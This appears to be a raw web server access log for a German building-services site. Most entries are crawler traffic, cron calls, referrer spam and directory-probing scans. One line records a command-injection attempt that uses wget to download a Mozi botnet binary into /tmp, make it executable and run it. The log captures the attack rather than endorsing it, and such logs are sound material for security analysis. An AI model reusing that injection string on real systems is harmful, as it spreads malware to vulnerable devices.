2a01:238:43f8:5f00:: - - [10/Mar/2025:08:19:53 +0100] "POST /wp-cron.php?doing_wp_cron=1741591192.9574389457702636718750 HTTP/1.1" 200 - "-" "MbB1R5Jbeh0X"
74.80.208.0 - - [10/Mar/2025:08:19:52 +0100] "GET /busiprof_team/the-boss/favicon/favicon-180.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
2a01:238:43f8:5f00:: - - [10/Mar/2025:08:20:29 +0100] "POST /wp-cron.php?doing_wp_cron=1741591229.3925809860229492187500 HTTP/1.1" 200 - "-" "h9gFGfhJKjfk"
74.80.208.0 - - [10/Mar/2025:08:20:29 +0100] "GET /prjekte/objektwartung-in-immobilien-durch-den-objektservice/favicon/favicon-114.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
66.249.66.0 - - [10/Mar/2025:08:21:21 +0100] "GET /contao/vendor/symfony/error-handler/ErrorEnhancer/ErrorEnhancerInterface.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.6943.141 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
2a01:238:43f8:5f00:: - - [10/Mar/2025:08:21:25 +0100] "POST /wp-cron.php?doing_wp_cron=1741591285.4179999828338623046875 HTTP/1.1" 200 - "-" "56IXx8jqyVrU"
74.80.208.0 - - [10/Mar/2025:08:21:25 +0100] "GET /prjekte/vogel-taubenabwehrprojekt/favicon/favicon-57.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
5.104.83.0 - - [10/Mar/2025:08:21:25 +0100] "GET / HTTP/1.1" 301 236 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3037.0 Safari/537.36"
5.104.83.0 - - [10/Mar/2025:08:21:26 +0100] "GET /wordpress/ HTTP/1.1" 301 246 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3037.0 Safari/537.36"
74.80.208.0 - - [10/Mar/2025:08:21:27 +0100] "GET /einbruchschutz/favicon/favicon-60.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
5.104.83.0 - - [10/Mar/2025:08:21:27 +0100] "GET /wp/ HTTP/1.1" 301 239 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3037.0 Safari/537.36"
5.104.83.0 - - [10/Mar/2025:08:21:28 +0100] "GET /blog/ HTTP/1.1" 301 241 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3037.0 Safari/537.36"
5.104.83.0 - - [10/Mar/2025:08:21:29 +0100] "GET /new/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3037.0 Safari/537.36"
5.104.83.0 - - [10/Mar/2025:08:21:30 +0100] "GET /old/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3037.0 Safari/537.36"
74.80.208.0 - - [10/Mar/2025:08:21:31 +0100] "GET /vogel-taubenabwehr/favicon/favicon-152.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
5.104.83.0 - - [10/Mar/2025:08:21:31 +0100] "GET /test/ HTTP/1.1" 301 241 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3037.0 Safari/537.36"
5.104.83.0 - - [10/Mar/2025:08:21:32 +0100] "GET /main/ HTTP/1.1" 301 241 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3037.0 Safari/537.36"
5.104.83.0 - - [10/Mar/2025:08:21:32 +0100] "GET /site/ HTTP/1.1" 301 241 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3037.0 Safari/537.36"
5.104.83.0 - - [10/Mar/2025:08:21:33 +0100] "GET /backup/ HTTP/1.1" 301 243 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3037.0 Safari/537.36"
5.104.83.0 - - [10/Mar/2025:08:21:34 +0100] "GET /demo/ HTTP/1.1" 301 241 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3037.0 Safari/537.36"
5.104.83.0 - - [10/Mar/2025:08:21:34 +0100] "GET /home/ HTTP/1.1" 301 241 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3037.0 Safari/537.36"
5.104.83.0 - - [10/Mar/2025:08:21:35 +0100] "GET /tmp/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3037.0 Safari/537.36"
5.104.83.0 - - [10/Mar/2025:08:21:38 +0100] "GET /cms/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3037.0 Safari/537.36"
5.104.83.0 - - [10/Mar/2025:08:21:39 +0100] "GET /dev/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3037.0 Safari/537.36"
5.104.83.0 - - [10/Mar/2025:08:21:40 +0100] "GET /portal/ HTTP/1.1" 301 243 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3037.0 Safari/537.36"
5.104.83.0 - - [10/Mar/2025:08:21:40 +0100] "GET /web/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3037.0 Safari/537.36"
74.80.208.0 - - [10/Mar/2025:08:21:50 +0100] "GET /danke-fuer-ihre-eintragung/favicon/favicon-120.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
208.65.90.0 - - [10/Mar/2025:08:21:58 +0100] "GET /reports/usage_202403.html HTTP/1.0" 200 92683 "https://xn--kr11-rzb.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
66.249.66.0 - - [10/Mar/2025:08:22:06 +0100] "GET /contao/vendor/symfony/http-kernel/ControllerMetadata/ArgumentMetadataFactory.php HTTP/1.1" 500 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.6943.141 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
2a01:238:43f8:5f00:: - - [10/Mar/2025:08:23:17 +0100] "POST /wp-cron.php?doing_wp_cron=1741591397.4478480815887451171875 HTTP/1.1" 200 - "-" "WL4fLMLMa6T7"
74.80.208.0 - - [10/Mar/2025:08:23:17 +0100] "GET /bodenverlegung/favicon/favicon-144.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
74.80.208.0 - - [10/Mar/2025:08:23:19 +0100] "GET /rauchmelder/favicon/favicon-120.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
208.65.90.0 - - [10/Mar/2025:08:23:38 +0100] "GET /reports/usage_202403.html HTTP/1.0" 200 92683 "https://xn--kr9-onb.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
2a01:238:43f8:5f00:: - - [10/Mar/2025:08:25:15 +0100] "POST /wp-cron.php?doing_wp_cron=1741591515.6615269184112548828125 HTTP/1.1" 200 - "-" "wOL4UaNWJ0La"
66.249.66.0 - - [10/Mar/2025:08:25:15 +0100] "GET /contao/vendor/symfony/swiftmailer-bundle/Resources/meta/ HTTP/1.1" 200 444 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.6943.141 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.80.208.0 - - [10/Mar/2025:08:25:15 +0100] "GET /danke-fuer-ihre-eintragung/favicon/favicon-114.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
66.249.66.0 - - [10/Mar/2025:08:25:25 +0100] "GET /contao/vendor/symfony/twig-bundle/Resources/config/twig.xml HTTP/1.1" 200 1672 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.6943.141 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
2a01:238:43f8:5f00:: - - [10/Mar/2025:08:27:18 +0100] "POST /wp-cron.php?doing_wp_cron=1741591638.1080079078674316406250 HTTP/1.1" 200 - "-" "QLTnvbwlWP5B"
74.80.208.0 - - [10/Mar/2025:08:27:18 +0100] "GET /trockenbauarbeiten/favicon/favicon-114.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
66.249.66.0 - - [10/Mar/2025:08:27:18 +0100] "GET /contao/assets/colorbox/package-lock.json HTTP/1.1" 200 28042 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.6943.141 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.80.208.0 - - [10/Mar/2025:08:27:33 +0100] "GET /sicherheitstechnik/favicon/favicon-152.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
66.249.66.0 - - [10/Mar/2025:08:27:49 +0100] "GET /contao/vendor/symfony-cmf/routing-bundle/src/Doctrine/Orm/Route.php HTTP/1.1" 500 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.6943.141 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.80.208.0 - - [10/Mar/2025:08:28:11 +0100] "GET /prjekte/brandschutz/favicon/favicon-180.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
2a01:238:43f8:5f00:: - - [10/Mar/2025:08:28:36 +0100] "POST /wp-cron.php?doing_wp_cron=1741591716.6456520557403564453125 HTTP/1.1" 200 - "-" "pbH65U5i6oEC"
74.80.208.0 - - [10/Mar/2025:08:28:36 +0100] "GET /rauchmelder/favicon/favicon-57.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
74.80.208.0 - - [10/Mar/2025:08:28:38 +0100] "GET /trockenbauarbeiten/favicon/favicon-180.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
74.80.208.0 - - [10/Mar/2025:08:28:55 +0100] "GET /rauchmelder/favicon/favicon-114.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
74.80.208.0 - - [10/Mar/2025:08:29:01 +0100] "GET /bueroreinigung/favicon/favicon-180.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
5.181.3.0 - - [10/Mar/2025:08:29:27 +0100] "GET /reports/usage_202402.html HTTP/1.0" 200 91181 "https://seattlexlimo.com/limo-services-between-seattle-wa-whistler-canada/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0"
2a01:238:43f8:5f00:: - - [10/Mar/2025:08:29:32 +0100] "POST /wp-cron.php?doing_wp_cron=1741591772.1390399932861328125000 HTTP/1.1" 200 - "-" "dTJR33BqWWYL"
74.80.208.0 - - [10/Mar/2025:08:29:32 +0100] "GET /malerarbeit/favicon/favicon-180.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
208.65.90.0 - - [10/Mar/2025:08:29:52 +0100] "GET /reports/usage_202403.html HTTP/1.0" 200 92683 "https://xn--krakn-m0a.cc" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
72.49.49.0 - - [10/Mar/2025:08:30:33 +0100] "GET /reports/usage_202403.html HTTP/1.0" 200 92683 "https://xn--krken10-bn4c.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0"
185.228.132.0 - - [10/Mar/2025:08:31:16 +0100] "GET /reports/usage_202402.html HTTP/1.0" 200 91181 "https://seattle-towncar.com/the-easiest-ways-to-get-from-seattle-to-vancouver-bc-canada/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0"
2a01:238:43f8:5f00:: - - [10/Mar/2025:08:31:28 +0100] "POST /wp-cron.php?doing_wp_cron=1741591888.6029179096221923828125 HTTP/1.1" 200 - "-" "HeO7yGXUGZth"
74.80.208.0 - - [10/Mar/2025:08:31:28 +0100] "GET /trockenbauarbeiten/favicon/favicon-72.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
66.249.66.0 - - [10/Mar/2025:08:32:33 +0100] "GET /contao/vendor/thecodingmachine/safe/generated/readline.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.6943.141 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
2a01:238:43f8:5f00:: - - [10/Mar/2025:08:33:02 +0100] "POST /wp-cron.php?doing_wp_cron=1741591982.4835579395294189453125 HTTP/1.1" 200 - "-" "OiqzhhCl4fS4"
74.80.208.0 - - [10/Mar/2025:08:33:02 +0100] "GET /impressum/favicon/favicon-72.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
2a01:238:43f8:5f00:: - - [10/Mar/2025:08:33:23 +0100] "POST /wp-cron.php?doing_wp_cron=1741592003.8428521156311035156250 HTTP/1.1" 200 - "-" "YhKt6baYuVT1"
74.80.208.0 - - [10/Mar/2025:08:33:23 +0100] "GET /brandschutz/favicon/favicon-60.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
47.82.10.0 - - [10/Mar/2025:08:33:39 +0100] "GET / HTTP/1.1" 301 236 "http://gebaeudetechnik.nrw" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
47.82.10.0 - - [10/Mar/2025:08:33:40 +0100] "GET / HTTP/1.1" 301 - "http://gebaeudetechnik.nrw" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
47.82.10.0 - - [10/Mar/2025:08:33:42 +0100] "GET / HTTP/1.1" 200 55565 "http://gebaeudetechnik.nrw" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
2a01:238:43f8:5f00:: - - [10/Mar/2025:08:35:56 +0100] "POST /wp-cron.php?doing_wp_cron=1741592156.2593719959259033203125 HTTP/1.1" 200 - "-" "pdozZzLWbDny"
74.80.208.0 - - [10/Mar/2025:08:35:56 +0100] "GET /prjekte/vogel-taubenabwehrprojekt/favicon/favicon-144.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
5.181.3.0 - - [10/Mar/2025:08:36:33 +0100] "GET /reports/usage_202402.html HTTP/1.0" 200 91181 "https://bellevue-towncar.com/redmond-signature-limo-service/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
66.249.66.0 - - [10/Mar/2025:08:37:24 +0100] "GET /contao/assets/tablesort/css/ HTTP/1.1" 200 440 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.6943.141 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
2a01:238:43f8:5f00:: - - [10/Mar/2025:08:37:26 +0100] "POST /wp-cron.php?doing_wp_cron=1741592245.9563970565795898437500 HTTP/1.1" 200 - "-" "lCJu3fKLm60d"
74.80.208.0 - - [10/Mar/2025:08:37:25 +0100] "GET /unterhaltsreinigung/favicon/favicon-76.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
54.36.149.0 - - [10/Mar/2025:08:38:17 +0100] "GET /contao/vendor/oyejorge/less.php/?C=S;O=A HTTP/2.0" 200 4414 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
2a01:238:43f8:5f00:: - - [10/Mar/2025:08:38:20 +0100] "POST /wp-cron.php?doing_wp_cron=1741592300.5583539009094238281250 HTTP/1.1" 200 - "-" "1wFwq5RselzF"
74.80.208.0 - - [10/Mar/2025:08:38:20 +0100] "GET /objektwartung/favicon/favicon-144.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
184.178.172.0 - - [10/Mar/2025:08:38:48 +0100] "GET /reports/usage_202403.html HTTP/1.0" 200 92683 "https://xn--krken14-bn4c.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
68.71.245.0 - - [10/Mar/2025:08:39:00 +0100] "GET /reports/usage_202403.html HTTP/1.0" 200 92683 "https://xn--rakn-f0a1446b.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
2a01:238:43f8:5f00:: - - [10/Mar/2025:08:39:16 +0100] "POST /wp-cron.php?doing_wp_cron=1741592356.5634090900421142578125 HTTP/1.1" 200 - "-" "KAOdmks0JA6b"
74.80.208.0 - - [10/Mar/2025:08:39:16 +0100] "GET /co2-warnmelder/favicon/favicon-60.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
72.49.49.0 - - [10/Mar/2025:08:39:27 +0100] "GET /reports/usage_202403.html HTTP/1.0" 200 92683 "https://xn--kr-kla.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
66.249.66.0 - - [10/Mar/2025:08:40:01 +0100] "GET /contao/vendor/php-http/message/src/UriFactory/ HTTP/1.1" 200 482 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.6943.141 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.0 - - [10/Mar/2025:08:40:19 +0100] "GET /contao/vendor/php-http/client-common/src/HttpAsyncClientDecorator.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.6943.141 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
2a01:238:43f8:5f00:: - - [10/Mar/2025:08:40:27 +0100] "POST /wp-cron.php?doing_wp_cron=1741592427.9080541133880615234375 HTTP/1.1" 200 - "-" "xPRamp5Qk36o"
74.80.208.0 - - [10/Mar/2025:08:40:27 +0100] "GET /busiprof_team/the-boss/favicon/favicon-114.png HTTP/2.0" 200 48541 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
2a01:238:43f8:5f00:: - - [10/Mar/2025:08:40:49 +0100] "POST /wp-cron.php?doing_wp_cron=1741592449.5582621097564697265625 HTTP/1.1" 200 - "-" "HsWqhoNwjy68"
74.80.208.0 - - [10/Mar/2025:08:40:49 +0100] "GET /newsletter/favicon/favicon-144.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
80.82.77.0 - - [10/Mar/2025:08:41:06 +0100] "\x16\x03\x02\x01o\x01" 400 226 "-" "-"
66.249.66.0 - - [10/Mar/2025:08:41:22 +0100] "GET /contao/assets/swipe/js/ HTTP/1.1" 200 439 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.6943.141 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.80.208.0 - - [10/Mar/2025:08:41:25 +0100] "GET /wp-content/uploads/building-Metallbau_1920.jpg HTTP/2.0" 404 2667 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
45.164.177.0 - - [10/Mar/2025:08:41:31 +0100] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 226 "-" "-"
47.82.10.0 - - [10/Mar/2025:08:41:32 +0100] "GET / HTTP/1.1" 301 229 "http://gdb-bonn.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
2a01:238:43f8:5f00:: - - [10/Mar/2025:08:41:33 +0100] "POST /wp-cron.php?doing_wp_cron=1741592493.3864529132843017578125 HTTP/1.1" 200 - "-" "1TyHJx7wfkzL"
47.82.10.0 - - [10/Mar/2025:08:41:33 +0100] "GET / HTTP/1.1" 200 55581 "http://gdb-bonn.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
66.249.66.0 - - [10/Mar/2025:08:42:15 +0100] "GET /contao/vendor/ramsey/uuid/src/UuidFactoryInterface.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.6943.141 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.0 - - [10/Mar/2025:08:42:23 +0100] "GET /contao/var/cache/prod/http_cache/@/5/P/dJLmzKDzT85bXAPjVugA HTTP/1.1" 200 34 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.6943.141 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
2a01:238:43f8:5f00:: - - [10/Mar/2025:08:42:48 +0100] "POST /wp-cron.php?doing_wp_cron=1741592568.2963230609893798828125 HTTP/1.1" 200 - "-" "OMtV41gU599q"
74.80.208.0 - - [10/Mar/2025:08:42:48 +0100] "GET /busiprof_team/the-boss/favicon/favicon-152.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
222.79.103.0 - - [10/Mar/2025:08:42:52 +0100] "GET / HTTP/1.1" 301 236 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
222.79.103.0 - - [10/Mar/2025:08:42:56 +0100] "GET / HTTP/1.1" 301 - "http://gebaeudetechnik.nrw" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
222.79.103.0 - - [10/Mar/2025:08:43:01 +0100] "GET / HTTP/1.1" 200 55563 "https://gebaeudetechnik.nrw/" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
2600:1900:0:4305:: - - [10/Mar/2025:08:43:13 +0100] "GET / HTTP/2.0" 404 - "-" "Go-http-client/2.0"
2a01:238:43f8:5f00:: - - [10/Mar/2025:08:44:15 +0100] "POST /wp-cron.php?doing_wp_cron=1741592654.9073970317840576171875 HTTP/1.1" 200 - "-" "kvTSAywxHFaD"
74.80.208.0 - - [10/Mar/2025:08:44:14 +0100] "GET /kontaktformular/allgemeine-geschaeftsbedingungen/favicon/favicon-72.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
74.80.208.0 - - [10/Mar/2025:08:44:32 +0100] "GET /wassermelder/favicon/favicon-57.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
74.80.208.0 - - [10/Mar/2025:08:44:42 +0100] "GET /kontaktformular/nicht-erlaubt/favicon/favicon-60.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
66.249.66.0 - - [10/Mar/2025:08:45:10 +0100] "GET /contao/vendor/symfony/css-selector/Node/HashNode.php HTTP/1.1" 500 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.6943.141 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
2a01:238:43f8:5f00:: - - [10/Mar/2025:08:46:04 +0100] "POST /wp-cron.php?doing_wp_cron=1741592764.0691239833831787109375 HTTP/1.1" 200 - "-" "4kjRJMa4iDOe"
74.80.208.0 - - [10/Mar/2025:08:46:04 +0100] "GET /montage-vorgefertigter-elemente/favicon/favicon-60.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
66.249.66.0 - - [10/Mar/2025:08:46:32 +0100] "GET /contao/vendor/ocramius/proxy-manager/src/ProxyManager/ProxyGenerator/LazyLoadingGhost/MethodGenerator/SetProxyInitializer.php HTTP/1.1" 500 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.6943.141 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
72.49.49.0 - - [10/Mar/2025:08:47:33 +0100] "GET /reports/usage_202403.html HTTP/1.0" 200 92683 "https://xn--ra-ypa.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
2a01:238:43f8:5f00:: - - [10/Mar/2025:08:47:48 +0100] "POST /wp-cron.php?doing_wp_cron=1741592868.8655190467834472656250 HTTP/1.1" 200 - "-" "T1q3S79lRLwH"
74.80.208.0 - - [10/Mar/2025:08:47:48 +0100] "GET /brandschutz/favicon/favicon-120.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
2a01:238:43f8:5f00:: - - [10/Mar/2025:08:48:13 +0100] "POST /wp-cron.php?doing_wp_cron=1741592893.1613659858703613281250 HTTP/1.1" 200 - "-" "TtMD7jsEKJxg"
74.80.208.0 - - [10/Mar/2025:08:48:13 +0100] "GET /austragen/favicon/favicon-144.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
208.65.90.0 - - [10/Mar/2025:08:48:16 +0100] "GET /reports/usage_202403.html HTTP/1.0" 200 92683 "https://xn--krken12-bn4c.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0"
